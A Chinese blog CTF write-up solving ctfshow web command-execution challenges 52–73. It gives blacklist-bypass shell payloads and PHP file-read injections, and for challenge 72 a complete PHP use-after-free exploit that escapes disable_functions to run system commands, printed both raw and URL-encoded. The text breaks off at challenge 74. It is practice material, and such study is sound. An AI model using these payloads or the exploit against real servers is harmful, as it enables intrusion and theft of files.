ctfshow web入门 命令执行2(52~77)(含总结)

最新推荐文章于 2024-08-06 15:06:01 发布
最新推荐文章于 2024-08-06 15:06:01 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: WEB 文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61448651/article/details/122518109
版权
ctfshow web入门命令执行2(52~77)(含总结)
web入门52
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
    system($c." >/dev/null 2>&1");
  }
}else{
  highlight_file(__FILE__);
}

这次把< >都过滤了用$IFS

若用nl${IFS}fl\ag.php||命令,会出现假flag,发现flag在根目录,用nl${IFS}/fl\ag.php|| 直接读取

nl$IFS/fla"g||

web入门53
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
    echo($c);
    $d = system($c);
    echo "<br>".$d;
  }else{
    echo 'no';
  }
}else{
  highlight_file(__FILE__);
}

一定会回显出c,没有>/dev/null 2>&1命令了

c"at${IFS}fla"g.php因为cat和flag被过滤了,用"分隔,两个%27也行,或nl${IFS}fla"g.php

web入门54
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
    system($c);
  }
}else{
  highlight_file(__FILE__);
}

flag在/bin/目录里/bin/ca?${IFS}???(此处应有8个问号,不知怎么只能显示三个)

web入门55
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
    system($c);
  }
}else{
  highlight_file(__FILE__);
}

字母全过滤了,没过滤数字、空格和?,字母命令是不行了

法一:获取flag的base64编码

url/?c=/???/????64 ????.???意思为

url/?c=/bin/base64 flag.php再解码即可

法二:将flag.php进行压缩

url/?c=/???/???/????2 ????.???意思为

url/?c=/usr/bin/bzip2 flag.php

bzip2是linux下压缩文件的命令

再访问flag.php.bz2下载即可

法三:https://blog.csdn.net/qq_46091464/article/details/108513145

web入门56
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
    system($c);
  }
}else{
  highlight_file(__FILE__);
}

与上题比把数字也过滤了,看来只能用法三了

数字、字母均过滤,给了点.?考虑无字母数字的命令执行

先构造POST上传文件的数据包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

(注意:ctrl+shift+k ,开头结尾三个反引号 , 开头反引号后面加语言)
浏览器打开,上传一个简单的文件再抓包

POST后构造poc执行命令/?c=.%20/???/????????[@-[]

注意[@-[]是linux下的匹配符,进行匹配的大写字母

把内容改成whoami进入www-data

在这里插入图片描述
直接执行命令,说是在bin里,写全代码也行

cat /var/www/html/flag.php

在这里插入图片描述

web入门57
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
    system("cat ".$c.".php");
  }
}else{
  highlight_file(__FILE__);
}

题目说//flag in 36.php

需要构造36

用到与$(())相关的数学运算

$(())=0

~$(())=-0

( (   ((~ (( (())))=-1 对-0取反

由此类推,36就是36个-1再取反

所以36为

$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))))))
web入门58

题目描述:命令执行,突破禁用函数

if(isset($_POST['c'])){
    $c= $_POST['c'];
    eval($c);
}else{
  highlight_file(__FILE__);
}

终于不是GET传参了呜呜呜

经测试,禁用的函数

c=phpinfo();

c=system('ls');

c=echo shell_exec('ls');

c=echo file_get_content('index.php')

可使用的函数 #命令学习来自大佬lt的笔记

c=echo file_get_contents('flag.php');c=readfile("flag.php");c=show_source('flag.php');c=print_r(file('flag.php'));c=highlight_file("flag.php");c=var_dump(file('flag.php'));c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}//一行一行读取c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}//一个一个字符读取c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}

一定加分号

web入门59
if(isset($_POST['c'])){    $c= $_POST['c'];    eval($c);}else{  highlight_file(__FILE__);}

c=print_r(scandir('./'));#看flag地址,当前

c=show_source('flag.php');c=print_r(file('flag.php'));c=highlight_file("flag.php");c=var_dump(file('flag.php'));c=$a=fopen("flag.php","r");echo fpassthru($a);c=$a=fopen("flag.php","r");echo fread($a,"1000");c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}//一行一行读取c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}//一个一个字符读取c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}

或者POST加GET传参

POST c=include($_GET[1]);

GET ?1=php://convert.base-encode/resource=flag.php

web入门60
if(isset($_POST['c'])){    $c= $_POST['c'];    eval($c);}else{  highlight_file(__FILE__);}

这些适用

c=show_source('flag.php');c=highlight_file("flag.php");c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}//一个一个字符读取c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}
web入门61
if(isset($_POST['c'])){    $c= $_POST['c'];    eval($c);}else{  highlight_file(__FILE__);}

可使用函数

c=show_source('flag.php');c=highlight_file("flag.php");
web入门62
if(isset($_POST['c'])){    $c= $_POST['c'];    eval($c);}else{  highlight_file(__FILE__);}

可使用函数

c=show_source('flag.php');c=highlight_file("flag.php");

新方法(前提$flag=flag)

c=include(‘flag.php’);echo $flag; (此处为英文单引号)

web入门63
if(isset($_POST['c'])){    $c= $_POST['c'];    eval($c);}else{  highlight_file(__FILE__);}

可用

c=show_source('flag.php');c=highlight_file("flag.php");c=include('flag.php');echo $flag;

新方法

c=include(‘flag.php’);var_dump(get_defined_vars());

get_defined_vars() 返回已经定义了的变量名和数组名

因为flag.php给include的了,所以flag.php中的变量名也会被输出

web入门64、65
if(isset($_POST['c'])){    $c= $_POST['c'];    eval($c);}else{  highlight_file(__FILE__);}

可用

c=show_source('flag.php');c=highlight_file("flag.php");c=include('flag.php');echo $flag;c=include('flag.php');var_dump(get_defined_vars());
web入门66、67、68
if(isset($_POST['c'])){    $c= $_POST['c'];    eval($c);}else{  highlight_file(__FILE__);}

c=var_dump(scandir('/'));#看flag地址,根目录

发现flag不在flag.php里而在flag.txt里,输命令的时候要注意了

c=highlight_file("/flag.txt");c=require('/flag.txt');c=require_once('/flag.txt');
web入门69、70

发现c=var_dump(scandir('/'));被ban了

var_export

发现flag在flag.txt里

c=highlight_file("/flag.txt");c=require('/flag.txt');c=require_once('/flag.txt');
web入门71

给的index.php

<?phperror_reporting(0);ini_set('display_errors', 0);if(isset($_POST['c'])){        $c= $_POST['c'];        eval($c);/*先执行$_POST['c']*/        $s = ob_get_contents();/*获取缓冲区内容,但不清除*/        ob_end_clean();/*清空缓冲区,eval($c)信息丢弃*/        echo preg_replace("/[0-9]|[a-z]/i","?",$s);        /*把拿到的缓冲区信息替换成?后输出/*}else{    highlight_file(__FILE__);}?>

hint

可以执行php代码让后面的匹配缓冲区不执行直接退出 payload:c=include(’/flag.txt’);exit(0);(此处为英文单引号,同下)

POST c=var_export(scandir(’/’));exit();

发现flag在flag.txt

注: exit(0);exit(); 都可以,exit(0);表示正常退出,其他数字均表示异常退出。

可用

c=include('/flag.txt');exit();c=require('/flag.txt');exit();c=require_once('/flag.txt');exit();

缓冲区:在PHP运行的过程中,可以将会产生输出的函数或操作结果暂时保存在PHP的缓冲区,只有当缓冲区满了、或者PHP运行完毕、或者在必要时候进行输出,才会将数据输出到浏览器,此缓冲数据的区域称为PHP的输出缓冲区(OB)。

web入门72(不懂)

给了index.php

<?phperror_reporting(0);ini_set('display_errors', 0);if(isset($_POST['c'])){        $c= $_POST['c'];        eval($c);        $s = ob_get_contents();        ob_end_clean();        echo preg_replace("/[0-9]|[a-z]/i","?",$s);}else{    highlight_file(__FILE__);}?>

scandir没了,说是利用glob协议扫描目录

glob://

c=$a="glob:///*.txt";if($b=opendir($a)){	  while(($file=readdir($b))!==false){ echo "filename:",$file."\n";	}	closedir($b); }exit();

上面直接找.txt结尾的文件

或者

c=?><?php	 $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);?>

/*是根目录下所有文件

发现flag在flag0.txt

再用ual脚本

<?phpfunction ctfshow($cmd) {    global $abc, $helper, $backtrace;    class Vuln {        public $a;        public function __destruct() {             global $backtrace;             unset($this->a);            $backtrace = (new Exception)->getTrace();            if(!isset($backtrace[1]['args'])) {                $backtrace = debug_backtrace();            }        }    }    class Helper {        public $a, $b, $c, $d;    }    function str2ptr(&$str, $p = 0, $s = 8) {        $address = 0;        for($j = $s-1; $j >= 0; $j--) {            $address <<= 8;            $address |= ord($str[$p+$j]);        }        return $address;    }    function ptr2str($ptr, $m = 8) {        $out = "";        for ($i=0; $i < $m; $i++) {            $out .= sprintf("%c",($ptr & 0xff));            $ptr >>= 8;        }        return $out;    }    function write(&$str, $p, $v, $n = 8) {        $i = 0;        for($i = 0; $i < $n; $i++) {            $str[$p + $i] = sprintf("%c",($v & 0xff));            $v >>= 8;        }    }    function leak($addr, $p = 0, $s = 8) {        global $abc, $helper;        write($abc, 0x68, $addr + $p - 0x10);        $leak = strlen($helper->a);        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }        return $leak;    }    function parse_elf($base) {        $e_type = leak($base, 0x10, 2);        $e_phoff = leak($base, 0x20);        $e_phentsize = leak($base, 0x36, 2);        $e_phnum = leak($base, 0x38, 2);        for($i = 0; $i < $e_phnum; $i++) {            $header = $base + $e_phoff + $i * $e_phentsize;            $p_type  = leak($header, 0, 4);            $p_flags = leak($header, 4, 4);            $p_vaddr = leak($header, 0x10);            $p_memsz = leak($header, 0x28);            if($p_type == 1 && $p_flags == 6) {                 $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;                $data_size = $p_memsz;            } else if($p_type == 1 && $p_flags == 5) {                 $text_size = $p_memsz;            }        }        if(!$data_addr || !$text_size || !$data_size)            return false;        return [$data_addr, $text_size, $data_size];    }    function get_basic_funcs($base, $elf) {        list($data_addr, $text_size, $data_size) = $elf;        for($i = 0; $i < $data_size / 8; $i++) {            $leak = leak($data_addr, $i * 8);            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {                $deref = leak($leak);                if($deref != 0x746e6174736e6f63)                    continue;            } else continue;            $leak = leak($data_addr, ($i + 4) * 8);            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {                $deref = leak($leak);                if($deref != 0x786568326e6962)                    continue;            } else continue;            return $data_addr + $i * 8;        }    }    function get_binary_base($binary_leak) {        $base = 0;        $start = $binary_leak & 0xfffffffffffff000;        for($i = 0; $i < 0x1000; $i++) {            $addr = $start - 0x1000 * $i;            $leak = leak($addr, 0, 7);            if($leak == 0x10102464c457f) {                return $addr;            }        }    }    function get_system($basic_funcs) {        $addr = $basic_funcs;        do {            $f_entry = leak($addr);            $f_name = leak($f_entry, 0, 6);            if($f_name == 0x6d6574737973) {                return leak($addr + 8);            }            $addr += 0x20;        } while($f_entry != 0);        return false;    }    function trigger_uaf($arg) {        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');        $vuln = new Vuln();        $vuln->a = $arg;    }    if(stristr(PHP_OS, 'WIN')) {        die('This PoC is for *nix systems only.');    }    $n_alloc = 10;     $contiguous = [];    for($i = 0; $i < $n_alloc; $i++)        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');    trigger_uaf('x');    $abc = $backtrace[1]['args'][0];    $helper = new Helper;    $helper->b = function ($x) { };    if(strlen($abc) == 79 || strlen($abc) == 0) {        die("UAF failed");    }    $closure_handlers = str2ptr($abc, 0);    $php_heap = str2ptr($abc, 0x58);    $abc_addr = $php_heap - 0xc8;    write($abc, 0x60, 2);    write($abc, 0x70, 6);    write($abc, 0x10, $abc_addr + 0x60);    write($abc, 0x18, 0xa);    $closure_obj = str2ptr($abc, 0x20);    $binary_leak = leak($closure_handlers, 8);    if(!($base = get_binary_base($binary_leak))) {        die("Couldn't determine binary base address");    }    if(!($elf = parse_elf($base))) {        die("Couldn't parse ELF header");    }    if(!($basic_funcs = get_basic_funcs($base, $elf))) {        die("Couldn't get basic_functions address");    }    if(!($zif_system = get_system($basic_funcs))) {        die("Couldn't get zif_system address");    }    $fake_obj_offset = 0xd0;    for($i = 0; $i < 0x110; $i += 8) {        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));    }    write($abc, 0x20, $abc_addr + $fake_obj_offset);    write($abc, 0xd0 + 0x38, 1, 4);     write($abc, 0xd0 + 0x68, $zif_system);     ($helper->b)($cmd);    exit();}ctfshow("cat /flag0.txt");ob_end_flush();?>

上述代码URL编码后payload

c=function%20ctfshow(%24cmd)%20%7b%20%20%20%20%20global%20%24abc%2c%20%24helper%2c%20%24backtrace%3b%20%20%20%20%20%20class%20vuln%20%7b%20%20%20%20%20%20%20%20%20public%20%24a%3b%20%20%20%20%20%20%20%20%20public%20function%20__destruct()%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20global%20%24backtrace%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20unset(%24this-%3ea)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24backtrace%20%3d%20(new%20exception)-%3egettrace()%3b%20%20%20%20%20%20%20%20%20%20%20%20%20if(!isset(%24backtrace%5b1%5d%5b'args'%5d))%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24backtrace%20%3d%20debug_backtrace()%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%7d%20%20%20%20%20%20class%20helper%20%7b%20%20%20%20%20%20%20%20%20public%20%24a%2c%20%24b%2c%20%24c%2c%20%24d%3b%20%20%20%20%20%7d%20%20%20%20%20%20function%20str2ptr(%26%24str%2c%20%24p%20%3d%200%2c%20%24s%20%3d%208)%20%7b%20%20%20%20%20%20%20%20%20%24address%20%3d%200%3b%20%20%20%20%20%20%20%20%20for(%24j%20%3d%20%24s-1%3b%20%24j%20%3e%3d%200%3b%20%24j--)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24address%20%3c%3c%3d%208%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24address%20%7c%3d%20ord(%24str%5b%24p%2b%24j%5d)%3b%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20return%20%24address%3b%20%20%20%20%20%7d%20%20%20%20%20%20function%20ptr2str(%24ptr%2c%20%24m%20%3d%208)%20%7b%20%20%20%20%20%20%20%20%20%24out%20%3d%20%22%22%3b%20%20%20%20%20%20%20%20%20for%20(%24i%3d0%3b%20%24i%20%3c%20%24m%3b%20%24i%2b%2b)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24out%20.%3d%20sprintf(%22%25c%22%2c(%24ptr%20%26%200xff))%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24ptr%20%3e%3e%3d%208%3b%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20return%20%24out%3b%20%20%20%20%20%7d%20%20%20%20%20%20function%20write(%26%24str%2c%20%24p%2c%20%24v%2c%20%24n%20%3d%208)%20%7b%20%20%20%20%20%20%20%20%20%24i%20%3d%200%3b%20%20%20%20%20%20%20%20%20for(%24i%20%3d%200%3b%20%24i%20%3c%20%24n%3b%20%24i%2b%2b)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24str%5b%24p%20%2b%20%24i%5d%20%3d%20sprintf(%22%25c%22%2c(%24v%20%26%200xff))%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24v%20%3e%3e%3d%208%3b%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%7d%20%20%20%20%20%20function%20leak(%24addr%2c%20%24p%20%3d%200%2c%20%24s%20%3d%208)%20%7b%20%20%20%20%20%20%20%20%20global%20%24abc%2c%20%24helper%3b%20%20%20%20%20%20%20%20%20write(%24abc%2c%200x68%2c%20%24addr%20%2b%20%24p%20-%200x10)%3b%20%20%20%20%20%20%20%20%20%24leak%20%3d%20strlen(%24helper-%3ea)%3b%20%20%20%20%20%20%20%20%20if(%24s%20!%3d%208)%20%7b%20%24leak%20%25%3d%202%20%3c%3c%20(%24s%20*%208)%20-%201%3b%20%7d%20%20%20%20%20%20%20%20%20return%20%24leak%3b%20%20%20%20%20%7d%20%20%20%20%20%20function%20parse_elf(%24base)%20%7b%20%20%20%20%20%20%20%20%20%24e_type%20%3d%20leak(%24base%2c%200x10%2c%202)%3b%20%20%20%20%20%20%20%20%20%20%24e_phoff%20%3d%20leak(%24base%2c%200x20)%3b%20%20%20%20%20%20%20%20%20%24e_phentsize%20%3d%20leak(%24base%2c%200x36%2c%202)%3b%20%20%20%20%20%20%20%20%20%24e_phnum%20%3d%20leak(%24base%2c%200x38%2c%202)%3b%20%20%20%20%20%20%20%20%20%20for(%24i%20%3d%200%3b%20%24i%20%3c%20%24e_phnum%3b%20%24i%2b%2b)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24header%20%3d%20%24base%20%2b%20%24e_phoff%20%2b%20%24i%20*%20%24e_phentsize%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24p_type%20%20%3d%20leak(%24header%2c%200%2c%204)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24p_flags%20%3d%20leak(%24header%2c%204%2c%204)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24p_vaddr%20%3d%20leak(%24header%2c%200x10)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24p_memsz%20%3d%20leak(%24header%2c%200x28)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24p_type%20%3d%3d%201%20%26%26%20%24p_flags%20%3d%3d%206)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24data_addr%20%3d%20%24e_type%20%3d%3d%202%20%3f%20%24p_vaddr%20%3a%20%24base%20%2b%20%24p_vaddr%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24data_size%20%3d%20%24p_memsz%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%20else%20if(%24p_type%20%3d%3d%201%20%26%26%20%24p_flags%20%3d%3d%205)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24text_size%20%3d%20%24p_memsz%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%20if(!%24data_addr%20%7c%7c%20!%24text_size%20%7c%7c%20!%24data_size)%20%20%20%20%20%20%20%20%20%20%20%20%20return%20false%3b%20%20%20%20%20%20%20%20%20%20return%20%5b%24data_addr%2c%20%24text_size%2c%20%24data_size%5d%3b%20%20%20%20%20%7d%20%20%20%20%20%20function%20get_basic_funcs(%24base%2c%20%24elf)%20%7b%20%20%20%20%20%20%20%20%20list(%24data_addr%2c%20%24text_size%2c%20%24data_size)%20%3d%20%24elf%3b%20%20%20%20%20%20%20%20%20for(%24i%20%3d%200%3b%20%24i%20%3c%20%24data_size%20%2f%208%3b%20%24i%2b%2b)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24leak%20%3d%20leak(%24data_addr%2c%20%24i%20*%208)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24leak%20-%20%24base%20%3e%200%20%26%26%20%24leak%20-%20%24base%20%3c%20%24data_addr%20-%20%24base)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24deref%20%3d%20leak(%24leak)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24deref%20!%3d%200x746e6174736e6f63)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%20else%20continue%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24leak%20%3d%20leak(%24data_addr%2c%20(%24i%20%2b%204)%20*%208)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24leak%20-%20%24base%20%3e%200%20%26%26%20%24leak%20-%20%24base%20%3c%20%24data_addr%20-%20%24base)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24deref%20%3d%20leak(%24leak)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24deref%20!%3d%200x786568326e6962)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%20else%20continue%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%24data_addr%20%2b%20%24i%20*%208%3b%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%7d%20%20%20%20%20%20function%20get_binary_base(%24binary_leak)%20%7b%20%20%20%20%20%20%20%20%20%24base%20%3d%200%3b%20%20%20%20%20%20%20%20%20%24start%20%3d%20%24binary_leak%20%26%200xfffffffffffff000%3b%20%20%20%20%20%20%20%20%20for(%24i%20%3d%200%3b%20%24i%20%3c%200x1000%3b%20%24i%2b%2b)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24addr%20%3d%20%24start%20-%200x1000%20*%20%24i%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24leak%20%3d%20leak(%24addr%2c%200%2c%207)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24leak%20%3d%3d%200x10102464c457f)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%24addr%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%7d%20%20%20%20%20%20function%20get_system(%24basic_funcs)%20%7b%20%20%20%20%20%20%20%20%20%24addr%20%3d%20%24basic_funcs%3b%20%20%20%20%20%20%20%20%20do%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%24f_entry%20%3d%20leak(%24addr)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%24f_name%20%3d%20leak(%24f_entry%2c%200%2c%206)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24f_name%20%3d%3d%200x6d6574737973)%20%7b%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20leak(%24addr%20%2b%208)%3b%20%20%20%20%20%20%20%20%20%20%20%20%20%7d%20%20%20%20%20%20%20%20%20%20%20%20%20%24addr%20%2b%3d%200x20%3b%20%20%20%20%20%20%20%20%20%7d%20while(%24f_entry%20!%3d%200)%3b%20%20%20%20%20%20%20%20%20return%20false%3b%20%20%20%20%20%7d%20%20%20%20%20%20function%20trigger_uaf(%24arg)%20%7b%20%20%20%20%20%20%20%20%20%20%24arg%20%3d%20str_shuffle('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')%3b%20%20%20%20%20%20%20%20%20%24vuln%20%3d%20new%20vuln()%3b%20%20%20%20%20%20%20%20%20%24vuln-%3ea%20%3d%20%24arg%3b%20%20%20%20%20%7d%20%20%20%20%20%20if(stristr(php_os%2c%20'win'))%20%7b%20%20%20%20%20%20%20%20%20die('this%20poc%20is%20for%20*nix%20systems%20only.')%3b%20%20%20%20%20%7d%20%20%20%20%20%20%24n_alloc%20%3d%2010%3b%20%20%20%20%20%20%24contiguous%20%3d%20%5b%5d%3b%20%20%20%20%20for(%24i%20%3d%200%3b%20%24i%20%3c%20%24n_alloc%3b%20%24i%2b%2b)%20%20%20%20%20%20%20%20%20%24contiguous%5b%5d%20%3d%20str_shuffle('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')%3b%20%20%20%20%20%20trigger_uaf('x')%3b%20%20%20%20%20%24abc%20%3d%20%24backtrace%5b1%5d%5b'args'%5d%5b0%5d%3b%20%20%20%20%20%20%24helper%20%3d%20new%20helper%3b%20%20%20%20%20%24helper-%3eb%20%3d%20function%20(%24x)%20%7b%20%7d%3b%20%20%20%20%20%20if(strlen(%24abc)%20%3d%3d%2079%20%7c%7c%20strlen(%24abc)%20%3d%3d%200)%20%7b%20%20%20%20%20%20%20%20%20die(%22uaf%20failed%22)%3b%20%20%20%20%20%7d%20%20%20%20%20%20%24closure_handlers%20%3d%20str2ptr(%24abc%2c%200)%3b%20%20%20%20%20%24php_heap%20%3d%20str2ptr(%24abc%2c%200x58)%3b%20%20%20%20%20%24abc_addr%20%3d%20%24php_heap%20-%200xc8%3b%20%20%20%20%20%20write(%24abc%2c%200x60%2c%202)%3b%20%20%20%20%20write(%24abc%2c%200x70%2c%206)%3b%20%20%20%20%20%20write(%24abc%2c%200x10%2c%20%24abc_addr%20%2b%200x60)%3b%20%20%20%20%20write(%24abc%2c%200x18%2c%200xa)%3b%20%20%20%20%20%20%24closure_obj%20%3d%20str2ptr(%24abc%2c%200x20)%3b%20%20%20%20%20%20%24binary_leak%20%3d%20leak(%24closure_handlers%2c%208)%3b%20%20%20%20%20if(!(%24base%20%3d%20get_binary_base(%24binary_leak)))%20%7b%20%20%20%20%20%20%20%20%20die(%22couldn't%20determine%20binary%20base%20address%22)%3b%20%20%20%20%20%7d%20%20%20%20%20%20if(!(%24elf%20%3d%20parse_elf(%24base)))%20%7b%20%20%20%20%20%20%20%20%20die(%22couldn't%20parse%20elf%20header%22)%3b%20%20%20%20%20%7d%20%20%20%20%20%20if(!(%24basic_funcs%20%3d%20get_basic_funcs(%24base%2c%20%24elf)))%20%7b%20%20%20%20%20%20%20%20%20die(%22couldn't%20get%20basic_functions%20address%22)%3b%20%20%20%20%20%7d%20%20%20%20%20%20if(!(%24zif_system%20%3d%20get_system(%24basic_funcs)))%20%7b%20%20%20%20%20%20%20%20%20die(%22couldn't%20get%20zif_system%20address%22)%3b%20%20%20%20%20%7d%20%20%20%20%20%20%20%24fake_obj_offset%20%3d%200xd0%3b%20%20%20%20%20for(%24i%20%3d%200%3b%20%24i%20%3c%200x110%3b%20%24i%20%2b%3d%208)%20%7b%20%20%20%20%20%20%20%20%20write(%24abc%2c%20%24fake_obj_offset%20%2b%20%24i%2c%20leak(%24closure_obj%2c%20%24i))%3b%20%20%20%20%20%7d%20%20%20%20%20%20write(%24abc%2c%200x20%2c%20%24abc_addr%20%2b%20%24fake_obj_offset)%3b%20%20%20%20%20write(%24abc%2c%200xd0%20%2b%200x38%2c%201%2c%204)%3b%20%20%20%20%20%20write(%24abc%2c%200xd0%20%2b%200x68%2c%20%24zif_system)%3b%20%20%20%20%20%20%20(%24helper-%3eb)(%24cmd)%3b%20%20%20%20%20exit()%3b%20%7d%20%20ctfshow(%22cat%20%2fflag0.txt%22)%3bob_end_flush()%3b%20%3f%3e

POST传入即可

web入门73
<?phperror_reporting(0);ini_set('display_errors', 0);if(isset($_POST['c'])){        $c= $_POST['c'];        eval($c);        $s = ob_get_contents();        ob_end_clean();        echo preg_replace("/[0-9]|[a-z]/i","?",$s);}else{    highlight_file(__FILE__);}?>先用

glob://扫目录,在flagc.txt

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);?>

再文件包含

c=include('/flagc.txt');exit();
web入门74
